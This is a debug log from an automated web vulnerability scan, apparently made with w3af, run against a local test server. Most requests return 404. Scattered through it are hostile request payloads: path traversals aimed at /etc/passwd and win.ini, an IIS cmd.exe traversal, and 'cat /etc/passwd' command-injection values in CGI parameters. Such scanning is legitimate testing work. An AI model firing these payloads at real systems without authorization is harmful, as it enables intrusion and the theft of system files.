http://localhost:9090/proxy/ssllogin?user=administrator&password=user returned HTTP code "404" (id=24934,from_cache=0,grep=1,rtt=0.10,did=tmD78hXl) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/theme1/selector?button=status,monitor,session\\">&button_url=/system/status/status,/system/status/moniter,/system/status/session returned HTTP code "404" (id=24937,from_cache=0,grep=1,rtt=0.17,did=YCJDo3oQ) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2498. [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/shoponline/fpdb/shop.mdb returned HTTP code "404" (id=24940,from_cache=0,grep=1,rtt=0.26,did=wVAOLr3L) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4541. [Wed Feb 12 10:04:37 2020 - debug] localhost:9090 connection pool stats (free:334 / in_use:11 / max:50 / total:345) [Wed Feb 12 10:04:37 2020 - debug] Connections with more in use time: (c8f756de80d3c47d, 0.17 sec) (26f39c1ece11a62b, 0.17 sec) (c4bb52ddb520d1cd, 0.10 sec) (e354a484a72ddf87, 0.07 sec) (f32d53eb651f6871, 0.06 sec) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/webcalendar/week.php?user=\\"> returned HTTP code "404" (id=24941,from_cache=0,grep=1,rtt=0.12,did=DCCTcfDN) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.ru.cp-1251 returned HTTP code "404" (id=24943,from_cache=0,grep=1,rtt=0.15,did=8b0BdKIV) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/imagemap.exe returned HTTP code "404" (id=24948,from_cache=0,grep=1,rtt=0.20,did=7Fa7RFAB) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/userlog.php returned HTTP code "404" (id=24952,from_cache=0,grep=1,rtt=0.17,did=4EQRQyAt) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/nph-maillist.pl returned HTTP code "404" (id=24953,from_cache=0,grep=1,rtt=0.15,did=6b71B3je) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4541. [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/servlet/ServletManager returned HTTP code "404" (id=24955,from_cache=0,grep=1,rtt=0.11,did=p6cQU7B4) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/~nobody/etc/passwd returned HTTP code "404" (id=24954,from_cache=0,grep=1,rtt=0.07,did=m2uCbNJo) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/examples/context returned HTTP code "404" (id=24947,from_cache=0,grep=1,rtt=0.24,did=u7DpvLSa) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/.history returned HTTP code "404" (id=24956,from_cache=0,grep=1,rtt=0.11,did=vgeZengS) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/netbasic/websinfo.bas returned HTTP code "404" (id=24949,from_cache=0,grep=1,rtt=0.06,did=Vz1UAuTo) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/surf/scwebusers returned HTTP code "404" (id=24945,from_cache=0,grep=1,rtt=0.17,did=XwdLF7SA) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/_vti_cnf/_vti_cnf/ returned HTTP code "404" (id=24951,from_cache=0,grep=1,rtt=0.19,did=KBzjXNdL) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/Webnews.exe returned HTTP code "404" (id=24944,from_cache=0,grep=1,rtt=0.36,did=pxM4AKm3) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/uploader.php returned HTTP code "404" (id=24966,from_cache=0,grep=1,rtt=0.08,did=ZFdielKr) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/.rhosts returned HTTP code "404" (id=24946,from_cache=0,grep=1,rtt=0.20,did=deQvTN4h) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/contents.htm returned HTTP code "404" (id=24957,from_cache=0,grep=1,rtt=0.08,did=4GCRVOIh) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/test/realPath.jsp returned HTTP code "404" (id=24950,from_cache=0,grep=1,rtt=0.32,did=zp7MAwgz) [Wed Feb 12 10:04:37 2020 - debug] symfony.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/scripts/fpremadm.exe returned HTTP code "404" (id=24963,from_cache=0,grep=1,rtt=0.02,did=zNLftzIP) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/.www_acl returned HTTP code "404" (id=24962,from_cache=0,grep=1,rtt=0.13,did=5mojzdJW) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/srvstatus.chl returned HTTP code "404" (id=24942,from_cache=0,grep=1,rtt=0.09,did=TOYo9BBm) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/wwwping/index.stm?wwwsite= returned HTTP code "404" (id=24964,from_cache=0,grep=1,rtt=0.17,did=RwdUlsvi) [Wed Feb 12 10:04:37 2020 - debug] file_upload.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4542. [Wed Feb 12 10:04:37 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] expect_ct.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] svn_users.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] private_ip.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] motw.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2499. [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/admcgi/scripts/Fpadmcgi.exe returned HTTP code "404" (id=24961,from_cache=0,grep=1,rtt=0.23,did=Wt1DxLIr) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/SUNWmc/htdocs/en_US/ returned HTTP code "404" (id=24960,from_cache=0,grep=1,rtt=0.14,did=mXdGm4zJ) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13269, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4991} [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/servlet/FingerServlet returned HTTP code "404" (id=24965,from_cache=0,grep=1,rtt=0.19,did=ylzPAozL) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13269, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4991} [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/test-cgi returned HTTP code "404" (id=24959,from_cache=0,grep=1,rtt=0.20,did=mPwXgXhJ) [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13269, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4991} [Wed Feb 12 10:04:37 2020 - debug] retirejs.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4543. [Wed Feb 12 10:04:37 2020 - debug] meta_generator.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:37 2020 - debug] serialized_object.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] blank_body.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] credit_cards.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] websockets_links.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 13269, 'reject-seen-url': 5849, 'reject-out-of-scope': 216, 'accept': 4991} [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/test/jsp/Language.jsp returned HTTP code "404" (id=24958,from_cache=0,grep=1,rtt=0.36,did=C9lfZ8Tu) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/GW5/GWWEB.EXE?HELP=bad-request returned HTTP code "404" (id=24967,from_cache=0,grep=1,rtt=0.24,did=JrhJhEYn) [Wed Feb 12 10:04:37 2020 - debug] csp.grep(uri="http://localhost:9090/spam/") took 0.03s to run [Wed Feb 12 10:04:37 2020 - debug] dom_xss.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c dir= returned HTTP code "404" (id=24968,from_cache=0,grep=1,rtt=0.01,did=F769IDb6) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2500. [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.kr.iso2022-kr returned HTTP code "404" (id=24969,from_cache=0,grep=1,rtt=0.14,did=UXNHvsfj) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/oem_webstage/oem.conf returned HTTP code "404" (id=24970,from_cache=0,grep=1,rtt=0.05,did=1sJwrxa9) [Wed Feb 12 10:04:37 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] keys.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4544. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/shop/normal_html.cgi?file=&cat /etc/passwd|= returned HTTP code "404" (id=24973,from_cache=0,grep=1,rtt=0.11,did=yPAJGOwP) [Wed Feb 12 10:04:37 2020 - debug] clamav.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2501. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4545. [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.el returned HTTP code "404" (id=24971,from_cache=0,grep=1,rtt=0.14,did=74235hqj) [Wed Feb 12 10:04:37 2020 - debug] vulners_db.grep(uri="http://localhost:9090/spam/") took 0.14s to run [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/Sites/Samples/Knowledge/Search/ViewCode.asp returned HTTP code "404" (id=24972,from_cache=0,grep=1,rtt=0.07,did=zbKSG8KO) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4546. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2502. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4547. [Wed Feb 12 10:04:37 2020 - debug] url_session.grep(uri="http://localhost:9090/spam/") took 0.01s to run [Wed Feb 12 10:04:37 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] objects.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] error_500.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] meta_tags.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] password_profiling.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] click_jacking.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] lang.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2503. [Wed Feb 12 10:04:37 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4548. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2504. [Wed Feb 12 10:04:37 2020 - debug] strange_reason.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] cache_control.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strange_headers.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] ssn.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] oracle.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] feeds.grep(uri="http://localhost:9090/spam/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4549. [Wed Feb 12 10:04:37 2020 - debug] localhost:9090 connection pool stats (free:344 / in_use:3 / max:50 / total:347) [Wed Feb 12 10:04:37 2020 - debug] Connections with more in use time: (bf412558545487c2, 0.07 sec) (940e3f210624c356, 0.05 sec) (8ab09df15a9abb20, 0.03 sec) [Wed Feb 12 10:04:37 2020 - debug] error_pages.grep(uri="http://localhost:9090/spam/") took 0.05s to run [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/aXKO2/ returned HTTP code "404" (id=24977,from_cache=0,grep=1,rtt=0.06,did=si9eQ5nK) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/active.log returned HTTP code "404" (id=24978,from_cache=0,grep=1,rtt=0.06,did=NBfzZyRx) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK returned HTTP code "404" (id=24975,from_cache=0,grep=1,rtt=0.23,did=EcRES18R) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/FileSeek.cgi?head=&foot=&cat /etc/passwd= returned HTTP code "404" (id=24976,from_cache=0,grep=1,rtt=0.10,did=AhgwtZiR) [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/test returned HTTP code "404" (id=24901,from_cache=0,grep=1,rtt=0.22,did=Bo5n25tB) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/php/mylog.phtml?screen=/etc/passwd returned HTTP code "404" (id=24974,from_cache=0,grep=1,rtt=0.08,did=S7y5Jpkd) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/search.asp?Search= returned HTTP code "404" (id=24979,from_cache=0,grep=1,rtt=0.05,did=Swp4N0kL) [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/shopping/database/metacart.mdb returned HTTP code "404" (id=24980,from_cache=0,grep=1,rtt=0.09,did=WNLujjvY) [Wed Feb 12 10:04:37 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/spam/") took 0.23s to run [Wed Feb 12 10:04:37 2020 - debug] file_upload.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2505. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/_private/_vti_cnf/ returned HTTP code "404" (id=24983,from_cache=0,grep=1,rtt=0.08,did=89kQiPoj) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/sysuser/docmgr/search.stm?path= returned HTTP code "404" (id=24984,from_cache=0,grep=1,rtt=0.08,did=3tElpRVO) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/manual/ag/esperfrm.htm returned HTTP code "404" (id=24982,from_cache=0,grep=1,rtt=0.11,did=l0w1LWRP) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.ru.cp866 returned HTTP code "404" (id=24981,from_cache=0,grep=1,rtt=0.11,did=uni5ayUo) [Wed Feb 12 10:04:37 2020 - debug] symfony.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] expect_ct.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] svn_users.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] private_ip.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] motw.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] meta_generator.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/docs/sdb/en/html/index.html returned HTTP code "404" (id=24985,from_cache=0,grep=1,rtt=0.07,did=BDOcHDlu) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/internal.sws?../../../../../../../../winnt/win.ini= returned HTTP code "404" (id=24986,from_cache=0,grep=1,rtt=0.07,did=iqmo1nsq) [Wed Feb 12 10:04:37 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4550. [Wed Feb 12 10:04:37 2020 - debug] retirejs.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:37 2020 - debug] serialized_object.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] blank_body.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] credit_cards.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2506. [Wed Feb 12 10:04:37 2020 - debug] csp.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] dom_xss.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] vulners_db.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] keys.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4551. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES///bogus_directory/nonexistent.asp returned HTTP code "404" (id=24989,from_cache=0,grep=1,rtt=0.10,did=Xmae8FbW) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/servlet/HelloWorldServlet returned HTTP code "404" (id=24990,from_cache=0,grep=1,rtt=0.14,did=OQPkRAnJ) [Wed Feb 12 10:04:37 2020 - debug] websockets_links.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/admisapi/fpadmin.htm returned HTTP code "404" (id=24991,from_cache=0,grep=1,rtt=0.07,did=V7TZ1lnY) [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/cgi-bin/webnews.pl returned HTTP code "404" (id=24988,from_cache=0,grep=1,rtt=0.29,did=9IzUiEoF) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2507. [Wed Feb 12 10:04:37 2020 - debug] clamav.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] localhost:9090 connection pool stats (free:344 / in_use:4 / max:50 / total:348) [Wed Feb 12 10:04:37 2020 - debug] Connections with more in use time: (22717be8b7508b3b, 0.06 sec) (bf412558545487c2, 0.03 sec) (c4bb52ddb520d1cd, 0.01 sec) (64c2b744345c9f6d, 0.01 sec) [Wed Feb 12 10:04:37 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4552. [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/servlet/sq1cdsn returned HTTP code "404" (id=24987,from_cache=0,grep=1,rtt=0.14,did=lT9L6wZr) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2508. [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/ojspdemos/basic/simple/welcomeuser.jsp returned HTTP code "404" (id=24993,from_cache=0,grep=1,rtt=0.36,did=8ZbbCW2H) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/cgi-bin/test-cgi returned HTTP code "404" (id=24994,from_cache=0,grep=1,rtt=0.12,did=plbKnxdW) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=24992,from_cache=0,grep=1,rtt=0.09,did=3xu74tmk) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4553. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2509. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4554. [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2510. [Wed Feb 12 10:04:37 2020 - debug] url_session.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] objects.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] error_500.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] meta_tags.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] password_profiling.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] click_jacking.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] lang.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/scripts/fpsrvadm.exe returned HTTP code "404" (id=24996,from_cache=0,grep=1,rtt=0.09,did=Fmj77Ip3) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/sysuser/docmgr/rename.stm?name= returned HTTP code "404" (id=24997,from_cache=0,grep=1,rtt=0.07,did=VVjZHV6i) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/_vti_inf.html returned HTTP code "404" (id=24999,from_cache=0,grep=1,rtt=0.13,did=IAFsPpUH) [Wed Feb 12 10:04:37 2020 - debug] GET http://localhost:9090/.sh_history returned HTTP code "404" (id=24998,from_cache=0,grep=1,rtt=0.09,did=rykJGydX) [Wed Feb 12 10:04:37 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2511. [Wed Feb 12 10:04:37 2020 - debug] error_pages.grep(uri="http://localhost:9090/7/") took 0.02s to run [Wed Feb 12 10:04:37 2020 - debug] strange_reason.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] cache_control.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] strange_headers.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] ssn.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] oracle.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] feeds.grep(uri="http://localhost:9090/7/") took 0.00s to run [Wed Feb 12 10:04:37 2020 - debug] HEAD http://localhost:9090/index.html.ltz.utf8 returned HTTP code "404" 